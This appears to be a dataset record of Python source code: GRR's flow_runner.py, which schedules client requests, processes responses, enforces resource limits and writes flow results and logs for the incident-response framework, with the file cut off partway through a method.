self.insertHtml('[{0}](<a href="{1}">{1}</a>)'.format(link_title, link_address)) | bsd-2-clause | 8,148,224,664,488,367,000 | 36.53022 | 120 | 0.535359 | false |
destijl/grr | grr/lib/flow_runner.py | 1 | 47503 | #!/usr/bin/env python
"""This file contains a helper class for the flows.
This flow context class provides all the methods for handling flows (i.e.,
calling clients, changing state, ...).
Each flow must have a flow runner before it can be executed. The flow runner is
responsible for queuing messages and maintaining scheduling state (e.g. request
IDs, outstanding requests, quotas etc),
Runners form a tree structure: A top level runner has no parent, but child
runners have a parent. For example, when a flow calls CallFlow(), the runner
creates a new flow (with a child runner) and passes execution to the new
flow. The child flow's runner queues messages on its parent's message
queues. The top level flow runner ends up with all the messages for all its
children in its queues, and then flushes them all at once to the data
stores. The goal is to prevent child flows from sending messages to the data
store before their parent's messages since this will create a race condition
(for example a child's client requests may be answered before the parent). We
also need to ensure that client messages for child flows do not get queued until
the child flow itself has finished running and is stored into the data store.
The following is a summary of the CallFlow() sequence:
1. The top level flow runner has no parent_runner.
2. The flow calls self.CallFlow() which is delegated to the flow's runner's
CallFlow() method.
3. The flow runner calls StartFlow(). This creates a child flow and a new flow
runner. The new runner has as a parent the top level flow.
4. The child flow calls CallClient() which schedules some messages for the
client. Since its runner has a parent runner, the messages are queued on the
parent runner's message queues.
5. The child flow completes execution of its Start() method, and its state gets
stored in the data store.
6. Execution returns to the parent flow, which may also complete, and serialize
its state to the data store.
7. At this point the top level flow runner contains in its message queues all
messages from all child flows. It then syncs all its queues to the data store
at the same time. This guarantees that client messages from child flows are
scheduled after the child flow itself is serialized into the data store.
To manage the flow queues, we have a QueueManager object. The Queue manager
abstracts the accesses to the queue by maintaining internal queues of outgoing
messages and providing methods for retrieving requests and responses from the
queues. Each flow runner has a queue manager which is uses to manage the flow's
queues. Child flow runners all share their parent's queue manager.
"""
import threading
import traceback
import logging
from grr.lib import aff4
from grr.lib import config_lib
from grr.lib import data_store
from grr.lib import events
# Note: OutputPluginDescriptor is also needed implicitly by FlowRunnerArgs
from grr.lib import output_plugin as output_plugin_lib
from grr.lib import queue_manager
from grr.lib import rdfvalue
from grr.lib import stats
from grr.lib import utils
from grr.lib.aff4_objects import multi_type_collection
from grr.lib.aff4_objects import sequential_collection
from grr.lib.aff4_objects import users as aff4_users
from grr.lib.rdfvalues import client as rdf_client
from grr.lib.rdfvalues import flows as rdf_flows
from grr.lib.rdfvalues import protodict as rdf_protodict
class FlowRunnerError(Exception):
"""Raised when there is an error during state transitions."""
class FlowLogCollection(sequential_collection.IndexedSequentialCollection):
RDF_TYPE = rdf_flows.FlowLog
# TODO(user): Another pickling issue. Remove this asap, this will
# break displaying old flows though so we will have to keep this
# around for a while.
FlowRunnerArgs = rdf_flows.FlowRunnerArgs # pylint: disable=invalid-name
RESULTS_SUFFIX = "Results"
RESULTS_PER_TYPE_SUFFIX = "ResultsPerType"
OUTPUT_PLUGIN_BASE_SUFFIX = "PluginOutput"
class FlowRunner(object):
"""The flow context class for hunts.
This is essentially the same as a normal context but it processes
all the requests that arrive regardless of any order such that one client that
doesn't respond does not make the whole hunt wait.
"""
def __init__(self, flow_obj, parent_runner=None, runner_args=None,
token=None):
"""Constructor for the Flow Runner.
Args:
flow_obj: The flow object this runner will run states for.
parent_runner: The parent runner of this runner.
runner_args: A FlowRunnerArgs() instance containing initial values. If not
specified, we use the runner_args from the flow_obj.
token: An instance of access_control.ACLToken security token.
"""
self.token = token or flow_obj.token
self.parent_runner = parent_runner
# If we have a parent runner, we use its queue manager.
if parent_runner is not None:
self.queue_manager = parent_runner.queue_manager
else:
# Otherwise we use a new queue manager.
self.queue_manager = queue_manager.QueueManager(token=self.token)
self.queued_replies = []
self.outbound_lock = threading.Lock()
self.flow_obj = flow_obj
# Initialize from a new runner args proto.
if runner_args is not None:
self.runner_args = runner_args
self.session_id = self.GetNewSessionID()
self.flow_obj.urn = self.session_id
# Flow state does not have a valid context, we need to create one.
self.context = self.InitializeContext(runner_args)
self.flow_obj.context = self.context
self.context.session_id = self.session_id
else:
# Retrieve args from the flow object's context. The flow object is
# responsible for storing our context, although they do not generally
# access it directly.
self.context = self.flow_obj.context
self.runner_args = self.flow_obj.runner_args
# Populate the flow object's urn with the session id.
self.flow_obj.urn = self.session_id = self.context.session_id
# Sent replies are cached so that they can be processed by output plugins
# when the flow is saved.
self.sent_replies = []
# If we're running a child flow and send_replies=True, but
# write_intermediate_results=False, we don't want to create an output
# collection object. We also only want to create it if runner_args are
# passed as a parameter, so that the new context is initialized.
#
# We can't create the collection as part of InitializeContext, as flow's
# urn is not known when InitializeContext runs.
if runner_args is not None and self.IsWritingResults():
with data_store.DB.GetMutationPool(token=self.token) as mutation_pool:
self.CreateCollections(mutation_pool)
def CreateCollections(self, mutation_pool):
logs_collection_urn = self._GetLogsCollectionURN(
self.runner_args.logs_collection_urn)
for urn, collection_type in [
(self.output_urn, sequential_collection.GeneralIndexedCollection),
(self.multi_type_output_urn, multi_type_collection.MultiTypeCollection),
(logs_collection_urn, FlowLogCollection),
]:
with aff4.FACTORY.Create(
urn,
collection_type,
mode="w",
mutation_pool=mutation_pool,
token=self.token):
pass
def IsWritingResults(self):
return (not self.parent_runner or not self.runner_args.send_replies or
self.runner_args.write_intermediate_results)
@property
def multi_type_output_urn(self):
return self.flow_obj.urn.Add(RESULTS_PER_TYPE_SUFFIX)
@property
def output_urn(self):
return self.flow_obj.urn.Add(RESULTS_SUFFIX)
def _GetLogsCollectionURN(self, logs_collection_urn):
if self.parent_runner is not None and not logs_collection_urn:
# We are a child runner, we should have been passed a
# logs_collection_urn
raise RuntimeError("Flow: %s has a parent %s but no logs_collection_urn"
" set." % (self.flow_obj.urn, self.parent_runner))
# If we weren't passed a collection urn, create one in our namespace.
return logs_collection_urn or self.flow_obj.urn.Add("Logs")
def OpenLogsCollection(self, logs_collection_urn, mode="w"):
"""Open the parent-flow logs collection for writing or create a new one.
If we receive a logs_collection_urn here it is being passed from the parent
flow runner into the new runner created by the flow object.
For a regular flow the call sequence is:
flow_runner --StartFlow--> flow object --CreateRunner--> (new) flow_runner
For a hunt the call sequence is:
hunt_runner --CallFlow--> flow_runner --StartFlow--> flow object
--CreateRunner--> (new) flow_runner
Args:
logs_collection_urn: RDFURN pointing to parent logs collection
mode: Mode to use for opening, "r", "w", or "rw".
Returns:
FlowLogCollection open with mode.
Raises:
RuntimeError: on parent missing logs_collection.
"""
return aff4.FACTORY.Create(
self._GetLogsCollectionURN(logs_collection_urn),
FlowLogCollection,
mode=mode,
object_exists=True,
token=self.token)
def InitializeContext(self, args):
"""Initializes the context of this flow."""
if args is None:
args = rdf_flows.FlowRunnerArgs()
output_plugins_states = []
for plugin_descriptor in args.output_plugins:
if not args.client_id:
self.Log("Not initializing output plugin %s as flow does not run on "
"the client.", plugin_descriptor.plugin_name)
continue
output_base_urn = self.session_id.Add(OUTPUT_PLUGIN_BASE_SUFFIX)
plugin_class = plugin_descriptor.GetPluginClass()
plugin = plugin_class(
self.output_urn,
args=plugin_descriptor.plugin_args,
output_base_urn=output_base_urn,
token=self.token)
try:
plugin.InitializeState()
# TODO(user): Those do not need to be inside the state, they
# could be part of the plugin descriptor.
plugin.state["logs"] = []
plugin.state["errors"] = []
output_plugins_states.append(
rdf_flows.OutputPluginState(
plugin_state=plugin.state, plugin_descriptor=plugin_descriptor))
except Exception as e: # pylint: disable=broad-except
logging.info("Plugin %s failed to initialize (%s), ignoring it.",
plugin, e)
parent_creator = None
if self.parent_runner:
parent_creator = self.parent_runner.context.creator
context = rdf_flows.FlowContext(
create_time=rdfvalue.RDFDatetime.Now(),
creator=parent_creator or self.token.username,
current_state="Start",
output_plugins_states=output_plugins_states,
remaining_cpu_quota=args.cpu_limit,
state=rdf_flows.FlowContext.State.RUNNING,
# Have we sent a notification to the user.
user_notified=False,)
return context
def GetNewSessionID(self):
"""Returns a random session ID for this flow based on the runner args.
Returns:
A formatted session id URN.
"""
# Calculate a new session id based on the flow args. Note that our caller
# can specify the base path to the session id, but they can not influence
# the exact session id we pick. This ensures that callers can not engineer a
# session id clash forcing us to overwrite an existing flow.
base = self.runner_args.base_session_id
if base is None:
base = self.runner_args.client_id or aff4.ROOT_URN
base = base.Add("flows")
return rdfvalue.SessionID(base=base, queue=self.runner_args.queue)
def OutstandingRequests(self):
"""Returns the number of all outstanding requests.
This is used to determine if the flow needs to be destroyed yet.
Returns:
the number of all outstanding requests.
"""
return self.context.outstanding_requests
def CallState(self,
messages=None,
next_state="",
request_data=None,
start_time=None):
"""This method is used to schedule a new state on a different worker.
This is basically the same as CallFlow() except we are calling
ourselves. The state will be invoked in a later time and receive all the
messages we send.
Args:
messages: A list of rdfvalues to send. If the last one is not a
GrrStatus, we append an OK Status.
next_state: The state in this flow to be invoked with the responses.
request_data: Any dict provided here will be available in the
RequestState protobuf. The Responses object maintains a reference
to this protobuf for use in the execution of the state method. (so
you can access this data by responses.request).
start_time: Start the flow at this time. This Delays notification for
flow processing into the future. Note that the flow may still be
processed earlier if there are client responses waiting.
Raises:
FlowRunnerError: if the next state is not valid.
"""
if messages is None:
messages = []
# Check if the state is valid
if not getattr(self.flow_obj, next_state):
raise FlowRunnerError("Next state %s is invalid.")
# Queue the response message to the parent flow
request_state = rdf_flows.RequestState(
id=self.GetNextOutboundId(),
session_id=self.context.session_id,
client_id=self.runner_args.client_id,
next_state=next_state)
if request_data:
request_state.data = rdf_protodict.Dict().FromDict(request_data)
self.QueueRequest(request_state, timestamp=start_time)
# Add the status message if needed.
if not messages or not isinstance(messages[-1], rdf_flows.GrrStatus):
messages.append(rdf_flows.GrrStatus())
# Send all the messages
for i, payload in enumerate(messages):
if isinstance(payload, rdfvalue.RDFValue):
msg = rdf_flows.GrrMessage(
session_id=self.session_id,
request_id=request_state.id,
response_id=1 + i,
auth_state=rdf_flows.GrrMessage.AuthorizationState.AUTHENTICATED,
payload=payload,
type=rdf_flows.GrrMessage.Type.MESSAGE)
if isinstance(payload, rdf_flows.GrrStatus):
msg.type = rdf_flows.GrrMessage.Type.STATUS
else:
raise FlowRunnerError("Bad message %s of type %s." % (payload,
type(payload)))
self.QueueResponse(msg, start_time)
# Notify the worker about it.
self.QueueNotification(session_id=self.session_id, timestamp=start_time)
def ScheduleKillNotification(self):
"""Schedules a kill notification for this flow."""
# Create a notification for the flow in the future that
# indicates that this flow is in progess. We'll delete this
# notification when we're done with processing completed
# requests. If we're stuck for some reason, the notification
# will be delivered later and the stuck flow will get
# terminated.
stuck_flows_timeout = rdfvalue.Duration(config_lib.CONFIG[
"Worker.stuck_flows_timeout"])
kill_timestamp = (rdfvalue.RDFDatetime().Now() + stuck_flows_timeout)
with queue_manager.QueueManager(token=self.token) as manager:
manager.QueueNotification(
session_id=self.session_id,
in_progress=True,
timestamp=kill_timestamp)
# kill_timestamp may get updated via flow.HeartBeat() calls, so we
# have to store it in the context.
self.context.kill_timestamp = kill_timestamp
def HeartBeat(self):
# If kill timestamp is set (i.e. if the flow is currently being
# processed by the worker), delete the old "kill if stuck" notification
# and schedule a new one, further in the future.
if self.context.kill_timestamp:
with queue_manager.QueueManager(token=self.token) as manager:
manager.DeleteNotification(
self.session_id,
start=self.context.kill_timestamp,
end=self.context.kill_timestamp + rdfvalue.Duration("1s"))
stuck_flows_timeout = rdfvalue.Duration(config_lib.CONFIG[
"Worker.stuck_flows_timeout"])
self.context.kill_timestamp = (
rdfvalue.RDFDatetime().Now() + stuck_flows_timeout)
manager.QueueNotification(
session_id=self.session_id,
in_progress=True,
timestamp=self.context.kill_timestamp)
def FinalizeProcessCompletedRequests(self, notification):
# Delete kill notification as the flow got processed and is not
# stuck.
with queue_manager.QueueManager(token=self.token) as manager:
manager.DeleteNotification(
self.session_id,
start=self.context.kill_timestamp,
end=self.context.kill_timestamp)
self.context.kill_timestamp = None
# If a flow raises in one state, the remaining states will not
# be processed. This is indistinguishable from an incomplete
# state due to missing responses / status so we need to check
# here if the flow is still running before rescheduling.
if (self.IsRunning() and notification.last_status and
(self.context.next_processed_request <= notification.last_status)):
logging.debug("Had to reschedule a notification: %s", notification)
# We have received a notification for a specific request but
# could not process that request. This might be a race
# condition in the data store so we reschedule the
# notification in the future.
delay = config_lib.CONFIG["Worker.notification_retry_interval"]
notification.ttl -= 1
if notification.ttl:
manager.QueueNotification(
notification, timestamp=notification.timestamp + delay)
def ProcessCompletedRequests(self, notification, unused_thread_pool=None):
"""Go through the list of requests and process the completed ones.
We take a snapshot in time of all requests and responses for this flow. We
then process as many completed requests as possible. If responses are not
quite here we leave it for next time.
It is safe to call this function as many times as needed. NOTE: We assume
that the flow queue is locked so another worker is not processing these
messages while we are. It is safe to insert new messages to the flow:state
queue.
Args:
notification: The notification object that triggered this processing.
"""
self.ScheduleKillNotification()
try:
self._ProcessCompletedRequests(notification)
finally:
self.FinalizeProcessCompletedRequests(notification)
def _ProcessCompletedRequests(self, notification):
"""Does the actual processing of the completed requests."""
# First ensure that client messages are all removed. NOTE: We make a new
# queue manager here because we want only the client messages to be removed
# ASAP. This must happen before we actually run the flow to ensure the
# client requests are removed from the client queues.
with queue_manager.QueueManager(token=self.token) as manager:
for request, _ in manager.FetchCompletedRequests(
self.session_id, timestamp=(0, notification.timestamp)):
# Requests which are not destined to clients have no embedded request
# message.
if request.HasField("request"):
manager.DeQueueClientRequest(request.client_id,
request.request.task_id)
# The flow is dead - remove all outstanding requests and responses.
if not self.IsRunning():
self.queue_manager.DestroyFlowStates(self.session_id)
return
processing = []
while True:
try:
# Here we only care about completed requests - i.e. those requests with
# responses followed by a status message.
for request, responses in self.queue_manager.FetchCompletedResponses(
self.session_id, timestamp=(0, notification.timestamp)):
if request.id == 0:
continue
if not responses:
break
# We are missing a needed request - maybe its not completed yet.
if request.id > self.context.next_processed_request:
stats.STATS.IncrementCounter("grr_response_out_of_order")
break
# Not the request we are looking for - we have seen it before
# already.
if request.id < self.context.next_processed_request:
self.queue_manager.DeleteFlowRequestStates(self.session_id, request)
continue
if not responses:
continue
# Do we have all the responses here? This can happen if some of the
# responses were lost.
if len(responses) != responses[-1].response_id:
# If we can retransmit do so. Note, this is different from the
# automatic retransmission facilitated by the task scheduler (the
# Task.task_ttl field) which would happen regardless of these.
if request.transmission_count < 5:
stats.STATS.IncrementCounter("grr_request_retransmission_count")
request.transmission_count += 1
self.ReQueueRequest(request)
break
# If we get here its all good - run the flow.
if self.IsRunning():
self.flow_obj.HeartBeat()
self.RunStateMethod(request.next_state, request, responses)
# Quit early if we are no longer alive.
else:
break
# At this point we have processed this request - we can remove it and
# its responses from the queue.
self.queue_manager.DeleteFlowRequestStates(self.session_id, request)
self.context.next_processed_request += 1
self.DecrementOutstandingRequests()
# Are there any more outstanding requests?
if not self.OutstandingRequests():
# Allow the flow to cleanup
if self.IsRunning() and self.context.current_state != "End":
self.RunStateMethod("End")
# Rechecking the OutstandingRequests allows the End state (which was
# called above) to issue further client requests - hence postpone
# termination.
if not self.OutstandingRequests():
# TODO(user): Deprecate in favor of 'flow_completions' metric.
stats.STATS.IncrementCounter("grr_flow_completed_count")
stats.STATS.IncrementCounter(
"flow_completions", fields=[self.flow_obj.Name()])
logging.debug("Destroying session %s(%s) for client %s",
self.session_id,
self.flow_obj.Name(), self.runner_args.client_id)
self.flow_obj.Terminate()
# We are done here.
return
except queue_manager.MoreDataException:
# Join any threads.
for event in processing:
event.wait()
# We did not read all the requests/responses in this run in order to
# keep a low memory footprint and have to make another pass.
self.FlushMessages()
self.flow_obj.Flush()
continue
finally:
# Join any threads.
for event in processing:
event.wait()
def RunStateMethod(self,
method,
request=None,
responses=None,
event=None,
direct_response=None):
"""Completes the request by calling the state method.
NOTE - we expect the state method to be suitably decorated with a
StateHandler (otherwise this will raise because the prototypes
are different)
Args:
method: The name of the state method to call.
request: A RequestState protobuf.
responses: A list of GrrMessages responding to the request.
event: A threading.Event() instance to signal completion of this request.
direct_response: A flow.Responses() object can be provided to avoid
creation of one.
"""
client_id = None
try:
self.context.current_state = method
if request and responses:
client_id = request.client_id or self.runner_args.client_id
logging.debug("%s Running %s with %d responses from %s",
self.session_id, method, len(responses), client_id)
else:
logging.debug("%s Running state method %s", self.session_id, method)
# Extend our lease if needed.
self.flow_obj.HeartBeat()
try:
method = getattr(self.flow_obj, method)
except AttributeError:
raise FlowRunnerError("Flow %s has no state method %s" %
(self.flow_obj.__class__.__name__, method))
method(
direct_response=direct_response, request=request, responses=responses)
if self.sent_replies:
self.ProcessRepliesWithOutputPlugins(self.sent_replies)
self.sent_replies = []
# We don't know here what exceptions can be thrown in the flow but we have
# to continue. Thus, we catch everything.
except Exception as e: # pylint: disable=broad-except
# This flow will terminate now
# TODO(user): Deprecate in favor of 'flow_errors'.
stats.STATS.IncrementCounter("grr_flow_errors")
stats.STATS.IncrementCounter("flow_errors", fields=[self.flow_obj.Name()])
logging.exception("Flow %s raised %s.", self.session_id, e)
self.Error(traceback.format_exc(), client_id=client_id)
finally:
if event:
event.set()
def GetNextOutboundId(self):
with self.outbound_lock:
my_id = self.context.next_outbound_id
self.context.next_outbound_id += 1
return my_id
def CallClient(self,
action_cls,
request=None,
next_state=None,
client_id=None,
request_data=None,
start_time=None,
**kwargs):
"""Calls the client asynchronously.
This sends a message to the client to invoke an Action. The run
action may send back many responses. These will be queued by the
framework until a status message is sent by the client. The status
message will cause the entire transaction to be committed to the
specified state.
Args:
action_cls: The function to call on the client.
request: The request to send to the client. If not specified (Or None) we
create a new RDFValue using the kwargs.
next_state: The state in this flow, that responses to this
message should go to.
client_id: rdf_client.ClientURN to send the request to.
request_data: A dict which will be available in the RequestState
protobuf. The Responses object maintains a reference to this
protobuf for use in the execution of the state method. (so you can
access this data by responses.request). Valid values are
strings, unicode and protobufs.
start_time: Call the client at this time. This Delays the client request
for into the future.
**kwargs: These args will be used to construct the client action semantic
protobuf.
Raises:
FlowRunnerError: If next_state is not one of the allowed next states.
RuntimeError: The request passed to the client does not have the correct
type.
"""
if client_id is None:
client_id = self.runner_args.client_id
if client_id is None:
raise FlowRunnerError("CallClient() is used on a flow which was not "
"started with a client.")
if not isinstance(client_id, rdf_client.ClientURN):
# Try turning it into a ClientURN
client_id = rdf_client.ClientURN(client_id)
if action_cls.in_rdfvalue is None:
if request:
raise RuntimeError("Client action %s does not expect args." %
action_cls.__name__)
else:
if request is None:
# Create a new rdf request.
request = action_cls.in_rdfvalue(**kwargs)
else:
# Verify that the request type matches the client action requirements.
if not isinstance(request, action_cls.in_rdfvalue):
raise RuntimeError("Client action expected %s but got %s" %
(action_cls.in_rdfvalue, type(request)))
outbound_id = self.GetNextOutboundId()
# Create a new request state
state = rdf_flows.RequestState(
id=outbound_id,
session_id=self.session_id,
next_state=next_state,
client_id=client_id)
if request_data is not None:
state.data = rdf_protodict.Dict(request_data)
# Send the message with the request state
msg = rdf_flows.GrrMessage(
session_id=utils.SmartUnicode(self.session_id),
name=action_cls.__name__,
request_id=outbound_id,
priority=self.runner_args.priority,
require_fastpoll=self.runner_args.require_fastpoll,
queue=client_id.Queue(),
payload=request,
generate_task_id=True)
if self.context.remaining_cpu_quota:
msg.cpu_limit = int(self.context.remaining_cpu_quota)
cpu_usage = self.context.client_resources.cpu_usage
if self.runner_args.cpu_limit:
msg.cpu_limit = max(self.runner_args.cpu_limit - cpu_usage.user_cpu_time -
cpu_usage.system_cpu_time, 0)
if msg.cpu_limit == 0:
raise FlowRunnerError("CPU limit exceeded.")
if self.runner_args.network_bytes_limit:
msg.network_bytes_limit = max(self.runner_args.network_bytes_limit -
self.context.network_bytes_sent, 0)
if msg.network_bytes_limit == 0:
raise FlowRunnerError("Network limit exceeded.")
state.request = msg
self.QueueRequest(state, timestamp=start_time)
def Publish(self, event_name, msg, delay=0):
"""Sends the message to event listeners."""
events.Events.PublishEvent(event_name, msg, delay=delay, token=self.token)
def CallFlow(self,
flow_name=None,
next_state=None,
sync=True,
request_data=None,
client_id=None,
base_session_id=None,
**kwargs):
"""Creates a new flow and send its responses to a state.
This creates a new flow. The flow may send back many responses which will be
queued by the framework until the flow terminates. The final status message
will cause the entire transaction to be committed to the specified state.
Args:
flow_name: The name of the flow to invoke.
next_state: The state in this flow, that responses to this
message should go to.
sync: If True start the flow inline on the calling thread, else schedule
a worker to actually start the child flow.
request_data: Any dict provided here will be available in the
RequestState protobuf. The Responses object maintains a reference
to this protobuf for use in the execution of the state method. (so
you can access this data by responses.request). There is no
format mandated on this data but it may be a serialized protobuf.
client_id: If given, the flow is started for this client.
base_session_id: A URN which will be used to build a URN.
**kwargs: Arguments for the child flow.
Raises:
FlowRunnerError: If next_state is not one of the allowed next states.
Returns:
The URN of the child flow which was created.
"""
client_id = client_id or self.runner_args.client_id
# This looks very much like CallClient() above - we prepare a request state,
# and add it to our queue - any responses from the child flow will return to
# the request state and the stated next_state. Note however, that there is
# no client_id or actual request message here because we directly invoke the
# child flow rather than queue anything for it.
state = rdf_flows.RequestState(
id=self.GetNextOutboundId(),
session_id=utils.SmartUnicode(self.session_id),
client_id=client_id,
next_state=next_state,
response_count=0)
if request_data:
state.data = rdf_protodict.Dict().FromDict(request_data)
# If the urn is passed explicitly (e.g. from the hunt runner) use that,
# otherwise use the urn from the flow_runner args. If both are None, create
# a new collection and give the urn to the flow object.
logs_urn = self._GetLogsCollectionURN(
kwargs.pop("logs_collection_urn", None) or
self.runner_args.logs_collection_urn)
# If we were called with write_intermediate_results, propagate down to
# child flows. This allows write_intermediate_results to be set to True
# either at the top level parent, or somewhere in the middle of
# the call chain.
write_intermediate = (kwargs.pop("write_intermediate_results", False) or
self.runner_args.write_intermediate_results)
try:
event_id = self.runner_args.event_id
except AttributeError:
event_id = None
# Create the new child flow but do not notify the user about it.
child_urn = self.flow_obj.StartFlow(
client_id=client_id,
flow_name=flow_name,
base_session_id=base_session_id or self.session_id,
event_id=event_id,
request_state=state,
token=self.token,
notify_to_user=False,
parent_flow=self.flow_obj,
sync=sync,
queue=self.runner_args.queue,
write_intermediate_results=write_intermediate,
logs_collection_urn=logs_urn,
**kwargs)
self.QueueRequest(state)
return child_urn
def SendReply(self, response):
"""Allows this flow to send a message to its parent flow.
If this flow does not have a parent, the message is ignored.
Args:
response: An RDFValue() instance to be sent to the parent.
Raises:
RuntimeError: If responses is not of the correct type.
"""
if not isinstance(response, rdfvalue.RDFValue):
raise RuntimeError("SendReply can only send a Semantic Value")
# Only send the reply if we have a parent and if flow's send_replies
# attribute is True. We have a parent only if we know our parent's request.
if (self.runner_args.request_state.session_id and
self.runner_args.send_replies):
request_state = self.runner_args.request_state
request_state.response_count += 1
# Make a response message
msg = rdf_flows.GrrMessage(
session_id=request_state.session_id,
request_id=request_state.id,
response_id=request_state.response_count,
auth_state=rdf_flows.GrrMessage.AuthorizationState.AUTHENTICATED,
type=rdf_flows.GrrMessage.Type.MESSAGE,
payload=response,
args_rdf_name=response.__class__.__name__,
args_age=int(response.age))
# Queue the response now
self.queue_manager.QueueResponse(request_state.session_id, msg)
if self.runner_args.write_intermediate_results:
self.QueueReplyForResultsCollection(response)
else:
# Only write the reply to the collection if we are the parent flow.
self.QueueReplyForResultsCollection(response)
def FlushMessages(self):
"""Flushes the messages that were queued."""
# Only flush queues if we are the top level runner.
if self.parent_runner is None:
self.queue_manager.Flush()
if self.queued_replies:
with data_store.DB.GetMutationPool(token=self.token) as mutation_pool:
for response in self.queued_replies:
sequential_collection.GeneralIndexedCollection.StaticAdd(
self.output_urn,
self.token,
response,
mutation_pool=mutation_pool)
multi_type_collection.MultiTypeCollection.StaticAdd(
self.multi_type_output_urn,
self.token,
response,
mutation_pool=mutation_pool)
self.queued_replies = []
def Error(self, backtrace, client_id=None, status=None):
"""Kills this flow with an error."""
client_id = client_id or self.runner_args.client_id
if self.IsRunning():
# Set an error status
reply = rdf_flows.GrrStatus()
if status is None:
reply.status = rdf_flows.GrrStatus.ReturnedStatus.GENERIC_ERROR
else:
reply.status = status
if backtrace:
reply.error_message = backtrace
self.flow_obj.Terminate(status=reply)
self.context.state = rdf_flows.FlowContext.State.ERROR
if backtrace:
logging.error("Error in flow %s (%s). Trace: %s", self.session_id,
client_id, backtrace)
self.context.backtrace = backtrace
else:
logging.error("Error in flow %s (%s).", self.session_id, client_id)
self.Notify("FlowStatus", client_id,
"Flow (%s) terminated due to error" % self.session_id)
def GetState(self):
return self.context.state
def IsRunning(self):
return self.context.state == rdf_flows.FlowContext.State.RUNNING
def ProcessRepliesWithOutputPlugins(self, replies):
if not self.runner_args.output_plugins or not replies:
return
for output_plugin_state in self.context.output_plugins_states:
plugin_descriptor = output_plugin_state.plugin_descriptor
plugin_state = output_plugin_state.plugin_state
output_plugin = plugin_descriptor.GetPluginForState(plugin_state)
# Extend our lease if needed.
self.flow_obj.HeartBeat()
try:
output_plugin.ProcessResponses(replies)
output_plugin.Flush()
log_item = output_plugin_lib.OutputPluginBatchProcessingStatus(
plugin_descriptor=plugin_descriptor,
status="SUCCESS",
batch_size=len(replies))
# Cannot append to lists in AttributedDicts.
plugin_state["logs"] += [log_item]
self.Log("Plugin %s sucessfully processed %d flow replies.",
plugin_descriptor, len(replies))
except Exception as e: # pylint: disable=broad-except
error = output_plugin_lib.OutputPluginBatchProcessingStatus(
plugin_descriptor=plugin_descriptor,
status="ERROR",
summary=utils.SmartStr(e),
batch_size=len(replies))
# Cannot append to lists in AttributedDicts.
plugin_state["errors"] += [error]
self.Log("Plugin %s failed to process %d replies due to: %s",
plugin_descriptor, len(replies), e)
def Terminate(self, status=None):
"""Terminates this flow."""
try:
self.queue_manager.DestroyFlowStates(self.session_id)
except queue_manager.MoreDataException:
pass
# This flow might already not be running.
if self.context.state != rdf_flows.FlowContext.State.RUNNING:
return
if self.runner_args.request_state.session_id:
# Make a response or use the existing one.
response = status or rdf_flows.GrrStatus()
client_resources = self.context.client_resources
user_cpu = client_resources.cpu_usage.user_cpu_time
sys_cpu = client_resources.cpu_usage.system_cpu_time
response.cpu_time_used.user_cpu_time = user_cpu
response.cpu_time_used.system_cpu_time = sys_cpu
response.network_bytes_sent = self.context.network_bytes_sent
response.child_session_id = self.session_id
request_state = self.runner_args.request_state
request_state.response_count += 1
# Make a response message
msg = rdf_flows.GrrMessage(
session_id=request_state.session_id,
request_id=request_state.id,
response_id=request_state.response_count,
auth_state=rdf_flows.GrrMessage.AuthorizationState.AUTHENTICATED,
type=rdf_flows.GrrMessage.Type.STATUS,
payload=response)
try:
# Queue the response now
self.queue_manager.QueueResponse(request_state.session_id, msg)
finally:
self.QueueNotification(session_id=request_state.session_id)
# Mark as terminated.
self.context.state = rdf_flows.FlowContext.State.TERMINATED
self.flow_obj.Flush()
def UpdateProtoResources(self, status):
"""Save cpu and network stats, check limits."""
user_cpu = status.cpu_time_used.user_cpu_time
system_cpu = status.cpu_time_used.system_cpu_time
self.context.client_resources.cpu_usage.user_cpu_time += user_cpu
self.context.client_resources.cpu_usage.system_cpu_time += system_cpu
user_cpu_total = self.context.client_resources.cpu_usage.user_cpu_time
system_cpu_total = self.context.client_resources.cpu_usage.system_cpu_time
self.context.network_bytes_sent += status.network_bytes_sent
if self.runner_args.cpu_limit:
if self.runner_args.cpu_limit < (user_cpu_total + system_cpu_total):
# We have exceeded our limit, stop this flow.
raise FlowRunnerError("CPU limit exceeded.")
if self.runner_args.network_bytes_limit:
if (self.runner_args.network_bytes_limit <
self.context.network_bytes_sent):
# We have exceeded our byte limit, stop this flow.
raise FlowRunnerError("Network bytes limit exceeded.")
def SaveResourceUsage(self, request, responses):
"""Method automatically called from the StateHandler to tally resource."""
_ = request
status = responses.status
if status:
# Do this last since it may raise "CPU limit exceeded".
self.UpdateProtoResources(status)
def _QueueRequest(self, request, timestamp=None):
if request.HasField("request") and request.request.name:
# This message contains a client request as well.
self.queue_manager.QueueClientMessage(
request.request, timestamp=timestamp)
self.queue_manager.QueueRequest(
self.session_id, request, timestamp=timestamp)
def IncrementOutstandingRequests(self):
with self.outbound_lock:
self.context.outstanding_requests += 1
def DecrementOutstandingRequests(self):
with self.outbound_lock:
self.context.outstanding_requests -= 1
def QueueRequest(self, request, timestamp=None):
# Remember the new request for later
self._QueueRequest(request, timestamp=timestamp)
self.IncrementOutstandingRequests()
def ReQueueRequest(self, request, timestamp=None):
self._QueueRequest(request, timestamp=timestamp)
def QueueResponse(self, response, timestamp=None):
self.queue_manager.QueueResponse(
self.session_id, response, timestamp=timestamp)
def QueueNotification(self, *args, **kw):
self.queue_manager.QueueNotification(*args, **kw)
def QueueReplyForResultsCollection(self, response):
self.queued_replies.append(response)
if self.runner_args.client_id:
# While wrapping the response in GrrMessage is not strictly necessary for
# output plugins, GrrMessage.source may be used by these plugins to fetch
# client's metadata and include it into the exported data.
self.sent_replies.append(
rdf_flows.GrrMessage(
payload=response, source=self.runner_args.client_id))
else:
self.sent_replies.append(response)
def SetStatus(self, status):
self.context.status = status
def Log(self, format_str, *args):
"""Logs the message using the flow's standard logging.
Args:
format_str: Format string
*args: arguments to the format string
Raises:
RuntimeError: on parent missing logs_collection
"""
format_str = utils.SmartUnicode(format_str)
status = format_str
if args:
try:
# The status message is always in unicode
status = format_str % args
except TypeError:
logging.error("Tried to log a format string with the wrong number "
"of arguments: %s", format_str)
logging.info("%s: %s", self.session_id, status)
self.SetStatus(utils.SmartUnicode(status))
log_entry = rdf_flows.FlowLog(
client_id=self.runner_args.client_id,
urn=self.session_id,
flow_name=self.flow_obj.__class__.__name__,
log_message=status)
logs_collection_urn = self._GetLogsCollectionURN(
self.runner_args.logs_collection_urn)
FlowLogCollection.StaticAdd(logs_collection_urn, self.token, log_entry)
def GetLog(self):
return self.OpenLogsCollection(
self.runner_args.logs_collection_urn, mode="r")
def Status(self, format_str, *args):
"""Flows can call this method to set a status message visible to users."""
